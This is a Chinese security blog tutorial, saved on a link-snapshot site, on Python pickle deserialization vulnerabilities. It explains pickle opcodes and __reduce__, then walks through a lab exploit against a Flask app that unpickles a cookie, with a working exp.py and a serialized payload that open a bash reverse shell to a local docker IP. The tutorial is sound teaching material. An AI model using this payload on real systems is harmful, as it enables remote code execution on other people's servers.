添加链接 注册    登录
link管理
链接快照平台
  • 输入网页链接,自动生成快照
  • 标签化管理网页链接
相关文章推荐
彷徨的热带鱼  ·  邵阳市政务热线服务中心2023年度报告书_ ...·  5 月前    · 
有情有义的葡萄酒  ·  《河南高速公路条例》这些亮点一定要知道_河南 ...·  8 月前    · 
无邪的八宝粥  ·  Linux访问网站时,http://.../ ...·  9 月前    · 
痴情的葫芦  ·  Vue引入外部Js文件并使用方法超级无敌详细 ...·  1 年前    · 
帅气的灭火器  ·  第58话 我是背叛者-最强原始人-漫画牛·  1 年前    · 
link管理  ›  浅析python unpickle反序列化漏洞 | m3lon
python python函数 序列化 漏洞挖掘
https://m3lon.github.io/2018/04/12/%E6%B5%85%E6%9E%90python-unpickle%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E/
悲伤的大熊猫
1 年前

0x01 前言

数据序列化常见的应用场景:数据结构网络传输,session存储,cache存储,或者配置文件上传,参数接收等接口处。

主要作用:能够让数据在存储或者传输的时候能够单单只用string的类型去表述相对复杂的数据结构,方便应用所见即所得,直接进行数据交流处理。

引发的安全问题:PHP的unserialize/__wakeup()漏洞、struts的ognl、xml解析的一系列漏洞、Ruby on Rails的xml/yaml,本文即将要讲的Python pickle/cPickle库的反序列化漏洞

此类漏洞常会导致RCE,原因:和我们所提到的应用场景有关。语言需要从string去解析出自己的语言数据结构,必然要去从这个string中做固定格式的解析,然后在内部把解析出来的结果去eval一下;或者,为了保证解析出来的内容为被序列化时候的Object状态,要调用一下状态保存的函数__wakeup__

0x02 Pickle模块

  1. pickle模块用来对Python对象执行序列化和反序列化。Python的任何对象都可以通过它永久保存到硬盘文件。Pickle实际上是先把Python对象(list、dict、class等)转换为字符流,这个字符流包含反序列化(从字符流构建对象)所需的所有数据。

  2. pickle有两个主要方法。第一个是dump-把对象导入到文件;第二个是load-从文件中加载对象。 

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    		 
    import pickle
     
    l1 = ['data1','data2','data3', 'data4']
    file = open("testfile",'wb') 
     
    # 把l1保存到文件
    pickle.dump(l1, file)   
    file.close() 

    ##############################################
     
    file = open("testfile",'r')
     
    # 从文件中加载保存的对象
    l2 = pickle.load(file)  
    print(l2)
    # 输出: ['data1', 'data2', 'data3']

  3. pickle instructions 

    1
    2
    3
    4
    		 
    cos
    system
    (S'/bin/sh'
    tR.

    Pickle is a stack language which means that the pickle instructions push data onto the stack or pop data off of the stack and operate on it in some fashion. To understand how the canonical pickle works, we need only understand six pickle instructions:

  4. c : Read to the newline as the module name, module . Read the next line as the object name, object . Push module.object onto the stack.
  5. ( : Insert a marker object onto the stack. For our purpose, this is paired with t to produce a tuple.
  6. t : Pop objects off the stack until a ( is popped and create a tuple object containing the objects popped (except for the ( ) in the order they were /pushed/ onto the stack. The tuple is pushed onto the stack
  7. S : Read the string in quotes up to the newline and push it onto the stack.
  8. R : Pop a tuple and a callable off the stack and call the callable with the tuple as arguments. Push the result onto the stack.
  9. . : End of the pickle.
  10. c:读取新的一行作为模块名module,读取下一行作为对象名 object ,然后将 module.object 压入到堆栈中。
  11. (:将一个标记对象插入到堆栈中。为了实现我们的目的,该指令会与t搭配使用,以产生一个元组。
  12. t:从堆栈中弹出对象,直到一个“ ( ”被弹出,并创建一个包含弹出对象(除了“ ( ”)的元组对象,并且这些对象的顺序必须跟它们压入堆栈时的顺序一致。然后,该元组被压入到堆栈中。
  13. S:读取引号中的字符串直到换行符处,然后将它压入堆栈。
  14. R:将一个元组和一个可调用对象弹出堆栈,然后以该元组作为参数调用该可调用的对象,最后将结果压入到堆栈中。
  15. .:结束pickle。
  16. c:接下来的2行内容类似于, os.system urllib.unquote module.object 的形式。
  17. (:就是左括号
  18. t:相当于右扩号
  19. S:代表本行后面的内容是 String ,即字符串。
  20. R:执行紧靠自己左边的一个括号对中的内容,即 ( 和他t直接的内容。
  21. .:点号结束pickle。

    22. 0x03漏洞分析

    类似于php的wakeup魔术方法,python中的__reduce__,可以在被反序列化的时候执行。具体内容请参考Python的官方库文档。而且并不止这一个函数。

    如果序列化的内容可控,只需要将相应代码写入__reduce__函数中,接收端在反序列化的时候就会自动执行。

    下面是一个简单的示例: 

    1
    2
    3
    4
    5
    6
    7
    8
    9
    		 
    import pickle
    import subprocess

    class m3lon(object):
      def __reduce__(self):
        return (subprocess.Popen,(('cmd.exe',),))
      
    pickle.dumps(m3lon())
    # 输出:"csubprocess\nPopen\np0\n((S'cmd.exe'\np1\ntp2\ntp3\nRp4\n."

    生成payload: csubprocess\nPopen\np0\n((S'cmd.exe'\np1\ntp2\ntp3\nRp4\n.

    下面模拟接收端

    弹出shell!

    0x04漏洞利用

    接下来以P神github仓库里的 某个开源靶场 为例讲解一下实际环境下的漏洞利用,可部署到本地docker复现。

    app.py 

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    		 
    import pickle
    import base64
    from flask import Flask, request

    app = Flask(__name__)

    @app.route("/")
    def index():
        try:
            user = base64.b64decode(request.cookies.get('user'))
            user = pickle.loads(user)
            username = user["username"]
        except:
            username = "Guest"

        return "Hello %s" % username

    if __name__ == "__main__":
        app.run()

    exp.py 

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    		 
    #!/usr/bin/env python3
    import requests
    import pickle
    import os
    import base64


    class exp(object):
        def __reduce__(self):
            s = """python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("172.17.0.1",8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'"""
            return (os.system, (s,))


    e = exp()
    s = pickle.dumps(e)

    response = requests.get("http://172.19.0.2:8000/", cookies=dict(
        user=base64.b64encode(s).decode()
    ))

    print(response.content)

    反序列化的内容为user,通过cookie传输(用户可控),于是pickle的反序列化漏洞便产生了,通过上面的exp可以查看我们生成的payload 

    1
    		 
    cposix\nsystem\np0\n(S\'python -c \\\'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("172.19.0.1",80));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);\\\'\'\np1\ntp2\nRp3\n.

    接收端在反序列化pickle.loads(user)过程中会自动执行__reduce__方法,弹出bash.

    利用过程中注意查看本地docker ip,以及docker环境中的ip地址,对应修改exp.py,上面的exp是我在本地修改好的.

    利用成功,如果想进行更深入的反序列化漏洞学习,可以看P神的 掌阅iReader某站Python漏洞挖掘

    Python Pickle反序列化带来的安全问题

    python模块:pickle(对象序列化和反序列化)

    Python unpickle 造成任意命令执行漏洞

 
推荐文章
彷徨的热带鱼  ·  邵阳市政务热线服务中心2023年度报告书_ 事业单位年度报告公示_ 邵阳市人民政府
5 月前
有情有义的葡萄酒  ·  《河南高速公路条例》这些亮点一定要知道_河南省交通运输厅
8 月前
无邪的八宝粥  ·  Linux访问网站时,http://.../无法解析,出现了某些故障(-5-没有与主机名关联的地址)__念-Linux
9 月前
痴情的葫芦  ·  Vue引入外部Js文件并使用方法超级无敌详细的教程「建议收藏」-腾讯云开发者社区-腾讯云
1 年前
帅气的灭火器  ·  第58话 我是背叛者-最强原始人-漫画牛
1 年前
Link管理   ·   Sov5搜索   ·   小百科
link管理 - 链接快照平台